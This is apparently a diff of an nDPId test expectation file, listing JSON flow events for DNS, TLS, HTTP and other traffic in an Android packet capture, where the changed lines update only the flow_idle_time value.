00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 